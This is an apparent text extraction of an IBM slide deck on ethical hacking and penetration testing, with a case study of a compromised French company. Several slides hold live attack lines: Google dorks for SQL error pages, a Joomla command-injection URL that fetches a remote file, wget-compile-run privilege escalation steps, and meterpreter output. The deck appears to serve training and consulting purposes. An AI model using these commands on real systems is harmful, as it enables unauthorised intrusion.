Ethical Hacking and Pentesting Vito Rallo, IBM Security Services Penetration Testing Have a Smartphone? SCAN ME

Post on 28-Oct-2019


Page 1

Ethical Hacking and Pentesting Vito Rallo, IBM Security Services Penetration Testing

Have a Smartphone? SCAN ME

Page 2

©2013 IBM Corporation

Hackers and Ethical Hackers

The hacker manifesto: “Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.”

Page 3

Having fun in Security

§ Ethical hackers enjoy the most exciting part of Security?

(Slide diagram labels: Network Security, Data Security, Application Security, Mobile Security, Cloud Security, Availability, Compliancy, Management, TESTING)

Page 4

Penetration testing through the years

§ early pentesting was a black art

§ true penetration testing skills were learned

§ there was no semblance of a commonly-accepted methodology; every pentester used to write his own

§ In late 2000, the open source security testing methodology, the OSSTMM

§ Pentest widespread, tools and knowledge

§ IBM has done pentest since 1995

Page 5

Outline of activities

§ The IBM penetration testing methodology includes:

– Project initiation
– Reconnaissance
– Discovery and assessment
– Perimeter or internal attack
– Exploitation
– Findings and analysis
– Deliverables (report)

Page 6

Today: the new pentesting

A good pentest is made by PEOPLE, not by TOOLS

It’s crucial to understand the process of an attack: not just the tools and the vulns, but the actual mindset needed to break in

Pentest is not a project, it’s a PROCESS!

There are plenty of companies who will teach you “ethical hacking”, “applied pentesting”, books, tools and so on. None of them will give you the hacking mindset.

Page 7

Client Values and Deliverables

Penetration testing services can deliver an effective, affordable service that provides a “hacker’s-eye” view of a client’s security posture.

Page 8

What IBM can deliver

Application Source Code Assessment (leverages IBM Rational® AppScan® Source Edition)

§ Assessment of application vulnerabilities
§ In-depth assessment of vulnerabilities only found through source code analysis
§ Map with regulations such as PCI, DISA, FISMA, and Sarbanes-Oxley, and best practices including the OWASP Top 10

Application and Mobile Security Assessment (leverages IBM Rational® AppScan® software)

§ Functional review of the application from both a client and server perspective
§ Comprehensive vulnerability assessment of the application and network infrastructure directly supporting the application
§ Mobile Applications Assessment

Penetration testing

§ Corporate networks and local infrastructures (remote/onsite)
§ WebApplications (blackbox/graybox)
§ Mobile and Embedded device testing (e.g. iPhone, Android)
§ SCADA control systems for utility and power companies
§ Client Server Apps and Mobile apps
§ Reverse engineering and exploit development

Page 9

DoS attacks categories

§ Network (L4 attacks)
– TCP/UDP/ICMP Floods
– Protocol Specific Weaknesses

§ Application (L7 attacks)
– HTTP
– Slow Loris, R.U.D.Y, etc
– SSL
– DNS

Page 10

DDoS Defence Strategy

§ Many providers/services → cloud service
– Scrub Services (clean pipe)
– MSS and Carrier Cloud Netflow

§ Mostly based on: Anomalies Analysis / Signature based detection

§ Common patterns: In-premises mitigations, Out-premises mitigation

§ Pain points: decentralization of the internet

§ Ideally, block attacks closest to the source

Page 11

New generation remediation trends

§ Overlay Networks
– Large distributed nodes, reverse proxies, bleeding edge known mitigation services (AKAMAI)

Page 12

Let’s get into the business: Pentest in real life

Page 13

Reconnaissance

§ DNS – Domain – IP → whois
§ Social Networks
§ Corporate info and so on…
§ Jobs ads.. !?

./theHarvester.py -d xxx.be -l 500 -b google
[-] Searching in Google:
Searching 500 results...
[+] Emails found:
------------------
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
…………..A LOT MORE
[+] Hosts found in search engines:
------------------------------------
1xx.244.74.x:www.xxx.be
1xx.244.x.200:ns.xxx.be
1xx.x.76.200:Ns.xxx.be
x.245.3.200:ns2.xxx.be
[-] Searching in Linkedin..
Users from Linkedin:
====================
Nico xxxff
Nishantxxxxar - Singapore Systems analyst web
Fraxx xxxens - Belgium
Lucxxx xxxans Systems technology analyst
xxx xxxeters
Nishant xxxxxxr

Page 14

Reconnaissance

§ Google hacking .. and Dorks

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:":2082/login/?user="
inurl:free.fr/index.php?id=
inurl:reservation.php?id=
inurl:promotion.php?id=
inurl:carte.php?id=
inurl:menu.php?id=

Page 15

Shodan

§ Google for hackers
§ Search engine of indexed “banners”

Page 16

Tons and tons of open devices

Page 17

Vulnerability Discovery

Latest 5 years tendency

Page 18

Key issues in WebApp security

• SQL Injection
• A definition:

“SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.”

• Cross Site Scripting
• A definition:

“Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users.”

Page 19

SQL injection in Login

Page 20

Cross-Site Scripting – The Exploit Process

IBM Confidential

Page 21

XSS, BeEF

§ Basically a client-exploitation Framework

Page 22

Establish a toehold

§ The beginning of the end
– Compromise a server: force the webapp to upload a malicious file → how? Password discovered, phpinclude, phpupload, exploiting CMS vulns and so on…
– Now, think about privilege escalation up to root!

Page 23

French company, call it “Carla”

– Owns several brands
– Offers Intranet services
– Hosts website in internal DMZ

§ Black Box
– Pure offensive hacking, no whitelisting, event monitoring team

(Network diagram labels: servers (web, ftp) in DMZ 172.20.10.x; one2one NAT/PAT; extranet.gammvert.fr, www.biotop.fr, www.invivo-group.com; public addresses 84.x.x.z, 84.x.x.y, 84.x.x.x)

Page 24

Carla Critical vuln

§ Acajoom, plugin for Joomla (pass to exec)

http://X.X.33.4//components/com_acajoom/self.acajoom.php ?s=system('wget%20http://x.x.x.x/myp.php’)

Page 25

Privilege Escalation

Linux environment analysis (uname -a)

cat /etc/redhat-release
Red Hat Enterprise Linux Server release 5.3 (Tikanga)

cd /tmp
wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c
gcc 36038-6.c -o nu
./nu

meterpreter > sysinfo
Computer : XXXXwebServer
OS : Linux XXXXwebServer 2.6.18-128.el5 #1 SMP Wed Dec 17 11:42:39 EST 2008 i686
Meterpreter : php/php

Page 26

The final attack scenario

(Diagram labels: Hacker, attacking station; attacking server; TUNNEL SSH; Reverse SSH; Control + Socks VPN; vuln direct exploitation; biotop webserver, inVivo; DMZ 172.20.10.x; Server Infrastructure (Windows and Linux hosts))

Page 27

Inside the DMZ

§ We can now connect TCP to all the inner hosts on the private LAN, scan, discovery, exploit again…

§ Touching services that are not available from outside the Firewall (firewall cannot catch me).

Page 28

Windows Domain Escalation

§ Just an old unused server
§ Get in, compromise one
§ Get NTLM hash for Admin, try on other server..
– Administrators tend to use the same password for local admin accounts
§ Get another one, search for tokens…
– Service in execution with Domain Admin rights
§ Escalation to the domain controller!

Page 29

The new Unawareness: next years’ fun

Page 30

Awareness and unawareness

§ Web App 5 years ago
– HTTP Based, GET, POST requests

§ Web App Today
– HTML, CSS, Dynamic, AJAX, RoR…
– still some Flash, Java, Silverlight

§ Web App in 2 years

Page 31

Web Apps in 2 years

Page 32

Mobile Threat Model

Slide from OWASP

Page 33

STRIDE Model for Mobile

Slide from OWASP

Page 34

Testing Framework for apps and devices

§ Dynamic Analysis
§ Static Analysis

Page 35

Final Considerations: Security posture of your enterprise

Page 36

Compliance is not total security

§ Scan, Checklists, Security Products.. Will they offer you a total bullet-proof security solution?

Page 37

The right attitude

§ Confused, Uncertainty, Fear, Unprepared, Proud, Unclear…

Page 38

Certainty

Page 39

Uncertainty

§ Create Security Intelligence
§ Iterate Prevention -> Monitor -> Response to dynamically improve the security model

Page 40

Emergency Response

§ Helps the customer under emergency contingency:

• Analysis of computer security incident data to determine the source of the incident, its cause, and its effects;
• Assist in preventing the effects of the computer security incident from spreading to other computer systems and networks;
• Assist with stopping the computer security incident at its source and/or protecting Customer’s computer systems and networks from the effects of the computer security incident;
• Recommendations for restoration of the affected computer systems and networks to normal operations; and
• Suggesting protection methods for Customer’s computer systems and networks from future similar occurrences

§ Incident Response; Containment and Remediation (Forensic analysis), Prevention

§ Who they are: highly skilled security people, forensics experts, certified analysts and ex-military

Page 41

Questions…

[email protected]

Vito Rallo @vitorallo